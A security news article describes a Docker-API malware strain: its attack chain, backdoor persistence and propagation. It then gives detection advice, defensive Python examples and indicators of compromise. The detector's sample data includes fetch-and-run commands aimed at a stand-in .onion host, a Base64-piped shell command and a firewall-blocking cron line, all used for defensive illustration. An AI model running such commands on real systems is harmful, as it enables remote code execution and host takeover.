A new strain of malware has been identified in Akamai Hunt’s honeypot infrastructure that targets misconfigured Docker APIs to gain full root access and establish long-term persistence.
First observed in August 2025, this variant diverges significantly from the June 2025 Trend Micro discovery by blocking other attackers’ access, embedding multiple infection tools, and preparing the foundation for a potentially distributed botnet.
Attack Chain and Capabilities
The attack begins with an HTTP POST request to the Docker daemon’s remote API (port 2375), instructing it to spin up an Alpine Linux container with the host’s filesystem mounted.
The container executes a Base64-encoded shell command that installs curl and Tor, fetches a secondary script from a Tor hidden service, and modifies the host’s SSH configuration to permit root login and add a malicious public key for backdoor access.
A cron job is then written to the host’s /etc/crontab, looping through firewall utilities (firewall-cmd, ufw, pfctl, iptables, nft) to block port 2375, effectively locking out any subsequent API requests and ensuring exclusive attacker control.
Once persistence is achieved, the container reports the compromised host to its command-and-control (C2) server over Tor. It downloads and executes a compressed dropper binary, which unpacks a Go-based dropper that embeds additional tools.
After parsing active user sessions via the utmp file, it launches Masscan to search for other exposed Docker APIs on port 2375. Detected hosts are targeted in the same manner, propagating the infection.
The binary also contains dormant logic for two further vectors: Telnet (port 23) using default device credentials, and Chromium remote debugging (port 9222) driven through the chromedp library. Neither routine is invoked in the current build, which suggests planned future expansion.
Detection and Mitigation
Defenders can identify this threat by monitoring for newly created containers that install package managers (apk, apt, yum) followed by immediate use of curl or wget.
Unusual Base64 command execution, Tor-bound connections to .onion domains, and abrupt cessation of services listening on critical ports (2375, 9222, 23) are key indicators.
Additional signs include host-mounted containers accessing /etc or /var/run/docker.sock, and cron entries that manipulate firewall rules.
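As an added illustration of these indicators (example code, not from Akamai's write-up), the following Python checks a constructed set of Docker container-create request bodies and a constructed /etc/crontab for the behaviours listed above: host-filesystem or docker.sock bind mounts, Base64-decoded command execution, a package-manager install immediately followed by curl/wget, .onion references, and cron entries that touch firewall tooling. The request shape follows the Docker Engine API's container create body (`Image`, `Cmd`, `HostConfig.Binds`); all sample values are invented.

```python
import re
from typing import Dict, List

# Constructed sample records (not real captures): simplified Docker
# "container create" API bodies as an API proxy or dockerd debug log might show them.
SAMPLE_CREATE_REQUESTS = [
    {   # host root mounted, command decoded from Base64 at runtime
        "Image": "alpine",
        "Cmd": ["sh", "-c", "echo ZWNobyBoaQ== | base64 -d | sh"],
        "HostConfig": {"Binds": ["/:/hostroot"]},
    },
    {   # benign: read-only bind of a web root
        "Image": "nginx:1.27",
        "Cmd": None,
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    },
    {   # docker.sock exposed, apk install followed by curl from a hidden service
        "Image": "alpine",
        "Cmd": ["sh", "-c", "apk add curl tor && curl http://constructedexample.onion/x.sh | sh"],
        "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"]},
    },
]

# Constructed /etc/crontab content (not from a real host)
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root iptables -I INPUT -p tcp --dport 2375 -j DROP
"""

SENSITIVE_HOST_PATHS = ("/", "/etc", "/var/run/docker.sock", "/root")
PKG_MANAGERS = r"\b(apk\s+add|apt(?:-get)?\s+install|yum\s+install)\b"
FETCH_TOOLS = r"\b(curl|wget)\b"
FIREWALL_TOOLS = r"\b(firewall-cmd|ufw|pfctl|iptables|nft)\b"


def inspect_create_request(req: Dict) -> List[str]:
    """Return human-readable findings for one container-create request body."""
    findings: List[str] = []
    for bind in (req.get("HostConfig") or {}).get("Binds") or []:
        host_path = bind.split(":", 1)[0]          # "/host/path:/container/path[:opts]"
        if host_path in SENSITIVE_HOST_PATHS:
            findings.append(f"sensitive host path mounted: {host_path}")
    cmd = req.get("Cmd") or []
    cmdline = " ".join(cmd) if isinstance(cmd, list) else str(cmd)
    if re.search(r"base64\s+(-d|--decode)\b", cmdline):
        findings.append("base64-decoded command execution")
    if re.search(PKG_MANAGERS, cmdline) and re.search(FETCH_TOOLS, cmdline):
        findings.append("package manager install followed by curl/wget")
    if re.search(r"\.onion\b", cmdline):
        findings.append("Tor hidden service reference in command")
    return findings


def scan_crontab(text: str) -> List[str]:
    """Return non-comment crontab lines that invoke a firewall utility."""
    hits: List[str] = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if re.search(FIREWALL_TOOLS, s):
            hits.append(s)
    return hits


def triage(requests: List[Dict]) -> Dict[int, List[str]]:
    """Map request index -> findings, keeping only requests with at least one finding."""
    return {i: f for i, r in enumerate(requests) if (f := inspect_create_request(r))}


if __name__ == "__main__":
    for idx, findings in triage(SAMPLE_CREATE_REQUESTS).items():
        print(f"request {idx}: " + "; ".join(findings))
    for line in scan_crontab(SAMPLE_CRONTAB):
        print("crontab touches firewall tooling: " + line)
```

Run in production, the request bodies would come from an authenticated API proxy or from `docker events` plus `docker inspect`, and the crontab scan would be wired to a file-integrity monitor rather than polled; the matching logic stays the same.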
Mitigation strategies focus on reducing attack surface and enforcing network hygiene:
– Isolate Docker hosts behind internal firewalls and apply network segmentation to limit lateral movement.
– Restrict exposure of the Docker API, Chrome DevTools port, and Telnet service to trusted management networks only.
– Enforce strong credential policies and rotate default passwords on all devices.
– Implement host-based monitoring to alert on unauthorized additions to SSH authorized_keys and changes to crontab.
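To make the first, second and fourth points concrete, here is an added Python example (not from the article) that audits a constructed daemon.json for plaintext or all-interface API exposure and compares a constructed authorized_keys file against a known-good baseline. The daemon.json keys (`hosts`, `tlsverify`, `tlscacert`, `tlscert`, `tlskey`) are real dockerd options; the addresses, certificate paths and key blobs are placeholders.

```python
import json
from typing import List, Set, Tuple

# Constructed daemon.json contents. The first exposes the API unauthenticated on
# every interface; the second keeps the Unix socket and binds a TLS-verified
# listener to a management address only. Paths and addresses are placeholders.
WEAK_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
"""

HARDENED_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.10.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/certs/ca.pem",
  "tlscert": "/etc/docker/certs/server-cert.pem",
  "tlskey": "/etc/docker/certs/server-key.pem"
}
"""


def audit_daemon_config(raw: str) -> List[str]:
    """Flag dockerd settings that expose the remote API without authentication."""
    cfg = json.loads(raw)
    issues: List[str] = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp_hosts and not cfg.get("tlsverify"):
        issues.append("TCP listener without tlsverify: unauthenticated remote API")
    for h in tcp_hosts:
        host, _, port = h[len("tcp://"):].rpartition(":")
        if host in ("", "0.0.0.0", "[::]"):
            issues.append(f"API bound to all interfaces: {h}")
        if port == "2375":
            issues.append(f"plaintext API port in use: {h}")
    if cfg.get("tlsverify"):
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                issues.append(f"tlsverify set but {key} missing")
    return issues


# Constructed authorized_keys snapshots (placeholder key material, not real keys)
BASELINE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderBaselineKey000000000000000 admin@bastion
"""
CURRENT_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderBaselineKey000000000000000 admin@bastion
no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQPlaceholderUnexpectedKey0000 unknown-origin
"""

KEY_TYPES = (
    "ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
    "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com", "sk-ecdsa-sha2-nistp256@openssh.com",
)


def parse_authorized_keys(text: str) -> Set[Tuple[str, str]]:
    """Extract (key type, key blob) pairs, ignoring leading options and trailing comments."""
    keys: Set[Tuple[str, str]] = set()
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        tokens = s.split()
        for i, tok in enumerate(tokens[:-1]):
            if tok in KEY_TYPES:
                keys.add((tok, tokens[i + 1]))
                break
    return keys


def unexpected_keys(baseline_text: str, current_text: str) -> Set[Tuple[str, str]]:
    """Keys present now that were not in the recorded baseline."""
    return parse_authorized_keys(current_text) - parse_authorized_keys(baseline_text)


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_config(raw) or "no issues")
    for ktype, blob in unexpected_keys(BASELINE_AUTHORIZED_KEYS, CURRENT_AUTHORIZED_KEYS):
        print(f"unexpected key added: {ktype} {blob[:16]}...")
```

The baseline comparison is deliberately keyed on type and blob only, so a rewritten comment or added option (as in the `no-pty` line) does not mask a new key, and a key that merely moved lines is not reported.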
By combining proactive threat hunting with strict API access controls and segmentation, organizations can neutralize emerging Docker-based threats before they escalate.
IOCs
| IOC | Type |
|---|---|
| wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion | Domain |
| 2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion | Domain |
| webhook[.]site/4fea5cbb-8863-4f25-862a-fd8f02095207 | URL |
| c38e013ed9aa1ef46411bef9605f7a41823f3eefebb8b30b9e35f39723c14d7c – docker-init.sh | Hash |
| 649974453ed40b72d08d378d72d43161ed5bd093a4f80eb5285f75e16fedbeb2 – system | Hash |
| 9451d3dc4b0ff9ea6afa503ffbfcd877944cac0860d6a0b8779c2bb5d03d3446 – dockerd | Hash |